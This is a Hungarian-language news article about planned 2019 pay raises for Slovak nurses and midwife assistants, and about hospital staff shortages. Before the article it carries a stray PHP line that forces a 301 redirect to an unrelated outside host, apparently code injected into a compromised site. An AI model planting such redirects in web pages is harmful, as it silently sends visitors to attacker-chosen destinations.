header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> 2019-ben emelkedni fog az egészségügyi nővérek és szülészasszisztensek bérezése
szombat, május 25, 2019

Keresés

2019-ben emelkedni fog az egészségügyi nővérek és szülészasszisztensek bérezése

2776Az egészségügyi nővérek és szülészasszisztensek bérezése 2019-ben emelkedni fog, a részleteket Andrea Kavalská egészségügyi miniszter ismerteti a hétvégén – jelezte Peter Pellegrini szlovák miniszterelnök a szerdai kormányülést követően. „Nagyon remélem, hogy az összeget, amelyben az egészségügyi és a pénzügyi tárca megállapodik, pozitívan értékeli majd a szakma" – nyilatkozta a TASR hírügynökségnek Peter Pellegrini kormányfő.

A béremelést két héttel ezelőtt az ellenzéki OĽaNO is szóba hozta, mire a szakminiszter kifejtette, erről már tárgyaltak. „Tisztában vagyok azzal, hogy a bérekkel tenni kell valamit, ugyanakkor a bérrendezés az egészségügyi nővérek és a szülészasszisztensek mellett az egészségügy egyéb szakdolgozóit is érinti. Úgy tűnik, hogy két év alatt sikerül elérnünk az egészségügyben dolgozók bérének tíz százalékkal történő emelését" – jegyezte meg a szakminiszter a problémára reagálva.

Az utóbbi időben több változás is érvénybe lépett az egészségügyben. A szaktárca módosította az egészségügyi nővérek hatáskörét. A módosítást követően az egészségügyi nővéreket három kategóriába sorolták: az alapellátást biztosító nővér, specializált nővér és haladó gyakorlattal rendelkező menedzsernővér kategóriába.

Az év első felében a nővérek bizonyos csoportjánál, a másodfokú ápolói képesítéssel rendelkezőknél már emelkedett a bérezés. Ugyanakkor mindezen intézkedések sem fékezték meg a szakmában észlelhető nővér- és orvoshiány növekedését.

A szlovákiai kórházakban jelenleg több mint ezer nővér hiányzik, ez a szám 2030-ra elérheti akár a tízezret is, derült ki az Egészségpolitikai Intézet nemrég közreadott tanulmányából.

TASR/Gazdaság.sk

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia